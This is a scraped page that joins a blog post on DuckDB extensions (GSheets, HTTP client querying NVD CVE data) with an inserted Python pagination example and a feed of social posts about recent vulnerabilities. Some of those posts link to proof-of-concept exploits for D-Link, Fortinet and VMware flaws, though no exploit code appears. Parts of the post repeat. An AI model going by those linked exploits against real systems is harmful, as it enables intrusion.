If you are a MySQL/MariaDB shop, this might be something to keep on the radar.
Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
Photo by Samson Andreea on Pexels.comThe DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.
By now, you should know how to install/load extensions:
INSTALL http_client FROM community;LOAD http_client;
The extension provides two main functions: http_get()
for GET requests and http_post()
for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.
The extension returns responses in a consistent format that includes:
The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.
The README provides a practical example of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.
We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.
We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):
CREATE TABLE yesterday AS (WITH __req AS ( SELECT http_get( 'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000' ) AS res ), __res AS ( SELECT UNNEST( from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]') ) AS cves FROM __req ) FROM __res);
We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.
What that query returns is an array of deeply nexted JSON records:
FROM yesterday LIMIT 3;┌──────────────────────────────────────────────────────────────────────────────┐│ cves ││ json │├──────────────────────────────────────────────────────────────────────────────┤│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith… ││ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith… │└──────────────────────────────────────────────────────────────────────────────┘
But DuckDB let’s us work with JSON pretty seamlessly.
It looks like the NVD contractors are milking their contract for all its worth:
FROM yesterdaySELECT cves->>'cve'->>'vulnStatus' AS vulnStatus, COUNT() AS ct, ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pctGROUP BY ALL;┌─────────────────────┬───────┬────────┐│ vulnStatus │ ct │ pct ││ varchar │ int64 │ double │├─────────────────────┼───────┼────────┤│ Awaiting Analysis │ 83 │ 65.87 ││ Received │ 34 │ 26.98 ││ Undergoing Analysis │ 9 │ 7.14 │└─────────────────────┴───────┴────────┘
You can add headers, and use getenv(var)
to fill in things like API keys.
This is a super fun extension to play with!
FIN
Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev
☮️
updated 2024-11-08T13:55:23
1 posts
Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.
But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.
TL;DR
(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)
Quacking In The [g]Sheets
The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.
The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.
If you work in an environment where domain experts collaborate with data science/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.
Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDB for this to work):
```sql
INSTALL gsheets FROM community;
LOAD gsheets;
```
Basic usage patterns include:
```sql
-- Read from a sheet
FROM read_gsheet('spreadsheet_url_or_id');
-- Write to a sheet
COPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);
```
The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.
I made a perma-copy of my OAuth’d access token:
```sql
LOAD gsheets;
CREATE PERSISTENT SECRET (
  TYPE gsheet,
  PROVIDER access_token,
  TOKEN 'yOUrToK3nH3re'
);
```
And, now we can look at the “schema”:
```
$ duckdb -json -c "
LOAD gsheets;
FROM read_gsheet(
  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
  sheet = 'Sheet1'
) LIMIT 1" | jq
[
  {
    "Vendor": "Sophos",
    "Title": "Sophos SFOS SQL Injection Vulnerability",
    "CVE": "CVE-2020-12271",
    "CVSS": 9.8,
    "Date of NVD publication": "4/27/20",
    "Date of vendor advisory": "Unknown",
    "Used in ransomware attacks?": "Known",
    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",
    "Date added to KEV Catalog": "11/3/21",
    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",
    "Date of Known Exploitation": "Apr-20",
    "Threat actor": "Unknown",
    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",
    "Metasploit Module": "N",
    "GreyNoise (#of Malicious IPs Scanning)": 0.0,
    "Number of vulnerable devices": "?",
    "Number of impacted devices": "?",
    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"
  }
]
```
And, perform normal ops on it:
```
$ duckdb -table -c "
LOAD gsheets;
FROM read_gsheet(
  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
  sheet='Sheet1'
)
SELECT Vendor, COUNT(Vendor) AS ct
GROUP BY Vendor
ORDER BY 2 DESC"
+---------------------+----+
| Vendor              | ct |
+---------------------+----+
| Cisco               | 72 |
| D-Link              | 19 |
| Ivanti              | 18 |
| Citrix              | 16 |
| Fortinet            | 13 |
| SonicWall           | 10 |
| Zyxel               |  9 |
| NETGEAR             |  8 |
| Juniper             |  6 |
| F5                  |  6 |
| PANW                |  5 |
| Sophos              |  5 |
| DrayTek             |  3 |
| Tenda               |  3 |
| TP-Link             |  2 |
| MikroTik            |  2 |
| Dasan               |  2 |
| Check Point         |  1 |
| D-Link and TRENDnet |  1 |
| Barracuda           |  1 |
| Netis               |  1 |
| FatPipe             |  1 |
| Arcadyan            |  1 |
| Sumavision          |  1 |
+---------------------+----+
```
The extension has some notable constraints to consider:
These limitations aside, the DuckDB GSheets extension will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.
The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.
My🦆Server
MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.
The system operates through dual interfaces — a MySQL wire protocol on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432 (for direct DuckDB SQL execution).
I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.
If you are a MySQL/MariaDB shop, this might be something to keep on the radar.
Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
Photo by Samson Andreea on Pexels.com
The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.
By now, you should know how to install/load extensions:
```sql
INSTALL http_client FROM community;
LOAD http_client;
```
The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.
The extension returns responses in a consistent format that includes:
The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.
The practical example the README provides of this extension’s utility is its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.
We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.
We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):
```sql
CREATE TABLE yesterday AS (
  WITH __req AS (
    SELECT http_get(
      'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'
    ) AS res
  ),
  __res AS (
    SELECT UNNEST(
      from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]')
    ) AS cves
    FROM __req
  )
  FROM __res
);
```
We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.
What that query returns is an array of deeply nested JSON records:
```
FROM yesterday LIMIT 3;
┌──────────────────────────────────────────────────────────────────────────────┐
│                                     cves                                     │
│                                     json                                     │
├──────────────────────────────────────────────────────────────────────────────┤
│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith…  │
│ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith…  │
│ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith…  │
└──────────────────────────────────────────────────────────────────────────────┘
```
But DuckDB lets us work with JSON pretty seamlessly.
It looks like the NVD contractors are milking their contract for all it’s worth:
```sql
FROM yesterday
SELECT
  cves->>'cve'->>'vulnStatus' AS vulnStatus,
  COUNT() AS ct,
  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pct
GROUP BY ALL;
```
```
┌─────────────────────┬───────┬────────┐
│     vulnStatus      │  ct   │  pct   │
│       varchar       │ int64 │ double │
├─────────────────────┼───────┼────────┤
│ Awaiting Analysis   │    83 │  65.87 │
│ Received            │    34 │  26.98 │
│ Undergoing Analysis │     9 │   7.14 │
└─────────────────────┴───────┴────────┘
```
You can add headers, and use getenv(var) to fill in things like API keys.
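The pagination the post leaves to "some shell scripting", plus the same vulnStatus tally, as an added Python example that is not from the Daily Drop post or the http_client extension. It assumes the NVD 2.0 paging fields startIndex / resultsPerPage / totalResults and the apiKey request header; the NVD_API_KEY variable name and the sample records are constructed for the example.

```python
"""Added example: page through the NVD CVE API 2.0 past its 2,000-record
window and reproduce the post's vulnStatus breakdown outside DuckDB.
Assumed: NVD 2.0 paging fields startIndex/resultsPerPage/totalResults and
the apiKey header; NVD_API_KEY (env var name) and SAMPLE_CVES are constructed.
"""
import json
import os
from collections import Counter
from typing import Callable, Dict, Iterator, List, Tuple
from urllib.request import Request, urlopen

NVD_BASE = "https://services.nvd.nist.gov/rest/json/cves/2.0/"
NVD_PAGE_LIMIT = 2000  # NVD's maximum resultsPerPage (the post's figure)


def nvd_query_url(day: str, start_index: int = 0) -> str:
    """Same one-day window the post queries, plus the paging offset."""
    return (
        f"{NVD_BASE}?pubStartDate={day}T00:00:00.000"
        f"&pubEndDate={day}T23:59:59.000"
        f"&resultsPerPage={NVD_PAGE_LIMIT}&startIndex={start_index}"
    )


def nvd_fetch_page(day: str, start_index: int) -> dict:
    """Live fetcher: one decoded NVD page. Reads the API key from the
    environment, as the post's getenv() idea; NVD_API_KEY is an assumed name."""
    headers = {"User-Agent": "nvd-pager-example"}
    api_key = os.getenv("NVD_API_KEY")
    if api_key:
        headers["apiKey"] = api_key
    with urlopen(Request(nvd_query_url(day, start_index), headers=headers)) as resp:
        return json.load(resp)


def iter_cves(fetch: Callable[[int], dict]) -> Iterator[dict]:
    """Yield every vulnerabilities[] record, advancing startIndex by the
    size of each page until totalResults is reached. `fetch(start_index)`
    returns one decoded page (live or fake)."""
    start = 0
    while True:
        page = fetch(start)
        batch = page.get("vulnerabilities", [])
        yield from batch
        start += len(batch)
        # Stop at the end, and also on an empty page so a wrong
        # totalResults can never turn this into an infinite loop.
        if not batch or start >= page.get("totalResults", 0):
            break


def vuln_status_breakdown(records: List[dict]) -> Dict[str, Tuple[int, float]]:
    """Count and percentage per vulnStatus, mirroring the post's
    GROUP BY ALL query (ROUND(ct * 100.0 / total, 2))."""
    counts = Counter(r["cve"].get("vulnStatus", "Unknown") for r in records)
    total = sum(counts.values()) or 1
    return {s: (c, round(c * 100.0 / total, 2)) for s, c in counts.items()}


# ---- constructed sample data standing in for the live API ----------
def _rec(cve_id: str, status: str) -> dict:
    return {"cve": {"id": cve_id, "vulnStatus": status}}


# Placeholder IDs (constructed), not real CVE records.
SAMPLE_CVES = [
    _rec("CVE-1900-0001", "Awaiting Analysis"),
    _rec("CVE-1900-0002", "Received"),
    _rec("CVE-1900-0003", "Awaiting Analysis"),
    _rec("CVE-1900-0004", "Undergoing Analysis"),
    _rec("CVE-1900-0005", "Awaiting Analysis"),
]
SAMPLE_PAGE_SIZE = 2  # tiny page so paging is exercised offline


def fake_fetch(start_index: int) -> dict:
    """Serve SAMPLE_CVES in NVD-shaped pages of SAMPLE_PAGE_SIZE records."""
    page = SAMPLE_CVES[start_index:start_index + SAMPLE_PAGE_SIZE]
    return {
        "resultsPerPage": len(page),
        "startIndex": start_index,
        "totalResults": len(SAMPLE_CVES),
        "vulnerabilities": page,
    }


def breakdown_for_day(day: str, live: bool = False) -> Dict[str, Tuple[int, float]]:
    """Full pipeline: page through one day's CVEs and summarise them.
    live=False uses the constructed pages; live=True hits the NVD API."""
    fetch = (lambda s: nvd_fetch_page(day, s)) if live else fake_fetch
    return vuln_status_breakdown(list(iter_cves(fetch)))
```

Run `breakdown_for_day("2024-11-08", live=True)` to reproduce the post's table from the real API; the offline default walks three constructed pages.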
This is a super fun extension to play with!
FIN
Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev
☮️
updated 2024-11-07T18:31:30
1 posts
Veeam security advisory from 06 November 2024 Veeam Backup Enterprise Manager Vulnerability (CVE-2024-40715)
CVE-2024-40715 (7.7 high) Veeam Backup & Replication Enterprise Manager authentication bypass while performing a Man-in-the-Middle (MITM) attack. No mention of exploitation.
#cybersecurity #infosec #vulnerability #CVE #veeam #cve_2024_40715
##updated 2024-11-06T23:39:52
1 posts
1 repos
@valorin I found this one a pretty good summary: https://blog.nollium.com/cve-2024-50340-remote-access-to-symfony-profiler-via-injected-arguments-d2f14b4f6ad7 although I believe Laravel applications were only impacted for the application environment name (production/staging etc.) and the debug flag was Symfony specific.
##updated 2024-11-06T18:31:17
1 posts
1 repos
CERT-In Flags Two High-Risk Cisco Vulnerabilities Targeting Key Infrastructure
CERT-In has added two high-severity Cisco vulnerabilities (CVE-2024-20484 & CVE-2024-20536) to its catalog, which impact Nexus Dashboard Fabric...
🔗️ [Cyble] https://link.is.it/e4pce7
##updated 2024-11-06T18:31:17
1 posts
1 repos
##updated 2024-11-06T18:31:17
1 posts
Microsoft security advisory: Release notes for Microsoft Edge Security Updates
This isn't showing the latest Microsoft Edge version which is 130.0.2849.80, but two security advisories indicate that the newest version addresses both Chromium vulnerabilities CVE-2024-10826 and CVE-2024-10827. These were originally announced by Google on Tuesday 05 November 2024
updated 2024-11-06T18:31:17
1 posts
updated 2024-11-06T18:31:11
1 posts
Cisco URWB Access Point Command Injection Vulnerability (CVE-2024-20418) https://fortiguard.fortinet.com/threat-signal-report/5574
##updated 2024-11-06T18:31:09
3 posts
HPE Issues Urgent Patches for Critical Vulnerabilities in Aruba Networking Access Points
https://thecyberexpress.com/hpe-security-patches-cve-2024-42509/?utm_source=flipboard&utm_medium=activitypub
Posted into Cybersecurity Today @cybersecurity-today-rhudaur
##HPE Issues Urgent Patches for Critical Vulnerabilities in Aruba Networking Access Points https://thecyberexpress.com/hpe-security-patches-cve-2024-42509/ #ArubaNetworkingAccessPoint #SecurityVulnerabilities #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202442509 #CVE202447460 #CyberNews #AOS10 #AOS8
##The critical security defects, tracked as CVE-2024-42509 (CVSS score of 9.8) and CVE-2024-47460 (CVSS score of 9.0), impact Aruba’s access point management protocol’s underlying CLI service. https://www.securityweek.com/hpe-patches-critical-vulnerabilities-in-aruba-access-points/
##updated 2024-11-06T18:31:09
1 posts
##updated 2024-11-06T15:30:46
6 posts
1 repos
Wow, this is just disgusting. I have no words for this level of malfeasance.
##🚨⚠️ If you own a D-Link NAS from the ShareCenter range, it is time to act: these devices are affected by a critical "Command Injection" vulnerability that very easily lets malicious actors take control of devices exposed on the Internet.
D-Link is not offering a fix for this flaw (the models are considered EOL, i.e. no longer supported by the vendor).
Affected models:
Recommended actions:
[Technical information]
⬇️
"Command Injection Vulnerability in name parameter for D-Link NAS"
👇
https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07
[Infosec news]
⬇️
"D-Link won’t fix critical flaw affecting 60,000 older NAS devices"
👇
https://www.bleepingcomputer.com/news/security/d-link-wont-fix-critical-flaw-affecting-60-000-older-nas-devices/
(According to Onyphe, more than 5,214 ShareCenter NAS devices in total are exposed on the Internet, including 358 devices currently detected online in #France)
The issue, tracked as CVE-2024-10914 (CVSS score of 9.2), impacts the account management functionality of the affected devices. https://www.securityweek.com/many-legacy-d-link-nas-devices-exposed-to-remote-attacks-via-critical-flaw/
##🚨POC - CVE-2024-10914 - Command Injection Vulnerability in `name` parameter for D-Link NAS
##updated 2024-11-05T21:35:24
1 posts
Malcolm v24.11.0 contains a new threat intelligence feed integration, a few new API calls, other minor improvements, bug fixes, and component version updates.
Malcolm is a powerful, easily deployable network traffic analysis tool suite for network security monitoring.
Malcolm operates as a cluster of containers 📦, isolated sandboxes which each serve a dedicated function of the system. This makes Malcolm deployable with frameworks like Docker, Podman, and Kubernetes. Check out the Quick Start guide for examples on how to get up and running.
Alternatively, dedicated official ISO installer images 💿 for Malcolm and Hedgehog Linux can be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split 🪓 into 2GB chunks and can be reassembled with scripts provided for both Bash 🐧 (release_cleaver.sh) and PowerShell 🪟 (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.
As always, join us on the Malcolm discussions board 💬 to engage with the community, or pop some corn 🍿 and watch a video 📼.
- dashboard-export to the list of Malcolm APIs (cisagov/Malcolm#401)
- ingest-stats to the list of Malcolm APIs (cisagov/Malcolm#488)
- intel.log to the ECS's threat fields
- ./scripts/configure script not prompting to regenerate the internal NetBox passwords when it should have
- malcolm_appliance_packager.sh on macOS (cisagov/Malcolm#492, thanks @robrui)
#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #INL #DHS #CISA #CISAgov
##updated 2024-10-31T15:31:04
1 posts
CISA Warns of Critical Vulnerabilities in Industrial Control Systems Affecting Key Infrastructure Sectors https://thecyberexpress.com/cisa-warns-of-cve-2024-8934/ #BeckhoffAutomationVulnerability #TwinCATPackageManager #TheCyberExpressNews #OScommandinjection #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE20248934 #CyberNews #CISA
##updated 2024-10-30T18:30:48
1 posts
updated 2024-10-28T17:59:30
1 posts
1 repos
Broadcom has a new security advisory for critical vulnerability CVE-2024-38821, OPS/MVS Event Management & Automation https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25196 #cybersecurity #infosec
##updated 2024-10-26T03:47:04
1 posts
##updated 2024-10-23T15:31:52
7 posts
1 repos
What a wonderful writeup of the #fortinet vulnerabilities found by watchtowr labs. It's insightful and entertaining :) #cybersecurity #security #infosec
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##lol, at this point you should just throw your fortinet devices into a landfill. https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##FortiJump Higher details are out. Even with the patch installed, apparently you can get RCE on FortiManager using a FortiGate it manages. https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##WatchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/ #cybersecurity #infosec #Fortinet
##watchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
Reference: CVE-2024-47575 (9.8 critical, disclosed 23 October 2024 by Fortinet, noted earlier on 13 October by @GossiTheDog on Mastodon, added to CISA KEV Catalog 23 October, reported by Mandiant to be #eitw since June) Fortinet FortiManager Missing Authentication Vulnerability
watchTowr is disclosing a separate and unidentified privilege escalation vulnerability linked to CVE-2024-47575 due to the original #FortiJump vulnerability currently being under mass exploitation. They also warn that the published IoC, while helpful, may not cover all attacks: an unregistered device being added to the system, could be easily bypassed, and exploitation could occur without generating any log noise at all.
#CVE_2024_47575 #vulnerability #fortinet #CVE #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Full Rapid7 analysis and #exploit PoC (with root shell!) for #FortiManager #CVE202447575 via @stephenfewer 🐚 Not a simple project, as it turned out :) https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis
##@wdormann I think you have that confused. CVE-2024-47575 was published on 23 October 2024: https://infosec.exchange/@screaminggoat/113358758617311503
##updated 2024-10-17T15:31:09
2 posts
Remediation for CVE-2024-20767 and CVE-2024-21216 Potential Exploitable Bugs https://blog.securelayer7.net/coldfusion-path-traversal-and-weblogic-unauthenticated-rce-remediation/
##updated 2024-10-11T18:32:57
1 posts
1 repos
From the OpenHPC Community project:
Please join the OpenHPC Community BoF at #SC24 in B306 12:15-1:15pm Thur. 21 Nov 2024 for latest details and if you have any questions or suggestions. Members and contributors will also discuss adding Warewulf4 support Wed. 20 Nov 2:30-3:00 PM at CIQ Booth #cve_2024_4131
Look for further information from https://bsky.app/profile/openhpc.bsky.social once they start posting!
##updated 2024-10-08T18:33:29
1 posts
Microsoft Security Response Center (MSRC) updated the CVSSv3.1 vector string for CVE-2024-43601 Visual Studio Code for Linux Remote Code Execution Vulnerability today:
The previous CVSSv3.1 score was presumably a 7.5 high, and now it's 7.8 base. How they decided that it was a local vector with low attack complexity and no privileges required is beyond me.
##updated 2024-10-02T15:31:39
19 posts
1 repos
VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware security advisory 11/18 update: VMSA-2024-0019
VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.
cc: @cR0w @ntkramer @dreadpir8robots @campuscodi
#vmware #vcenter #vulnerability #cve #CVE_2024_38812 #CVE_2024_38813 #eitw #activeexploitation
###CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.
- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38812
- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38813
More:
- 2024 CWE Top 25 Most Dangerous Software Weaknesses https://www.cisa.gov/news-events/alerts/2024/11/20/2024-cwe-top-25-most-dangerous-software-weaknesses
- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication https://www.cisa.gov/news-events/alerts/2024/11/20/usda-releases-success-story-detailing-implementation-phishing-resistant-multi-factor-authentication @cisacyber #cybersecurity #infosec
##CVE ID: CVE-2024-38813
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Privilege Escalation Vulnerability
Notes: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968 ; https://nvd.nist.gov/vuln/detail/CVE-2024-38813
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-38813
CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity
##And there's the advisory update, admittedly later than I was expecting: #VMware vCenter Server / Cloud Foundation CVE-2024-38812 and CVE-2024-38813 officially exploited in the wild, per Broadcom. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
##Broadcom: #VMware vCenter Server updates address critical heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
VMSA-2024-0019: Questions & Answers https://github.com/vmware/vcf-security-and-compliance-guidelines/blob/main/security-advisories/vmsa-2024-0019/README.md @vmwaresrc
More: Critical RCE bug in VMware vCenter Server now exploited in attacks https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/ @BleepingComputer @serghei #cybersecurity #infosec
##@neurovagrant VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
THE HITS JUST KEEP COMING
##updated 2024-10-02T14:16:47.610000
19 posts
1 repos
https://github.com/groshi/CVE-2024-38812-POC-5-Hands-Private
VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware security advisory 11/18 update: VMSA-2024-0019
VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.
cc: @cR0w @ntkramer @dreadpir8robots @campuscodi
#vmware #vcenter #vulnerability #cve #CVE_2024_38812 #CVE_2024_38813 #eitw #activeexploitation
###CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.
- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38812
- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38813
More:
- 2024 CWE Top 25 Most Dangerous Software Weaknesses https://www.cisa.gov/news-events/alerts/2024/11/20/2024-cwe-top-25-most-dangerous-software-weaknesses
- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication https://www.cisa.gov/news-events/alerts/2024/11/20/usda-releases-success-story-detailing-implementation-phishing-resistant-multi-factor-authentication @cisacyber #cybersecurity #infosec
##CVE ID: CVE-2024-38812
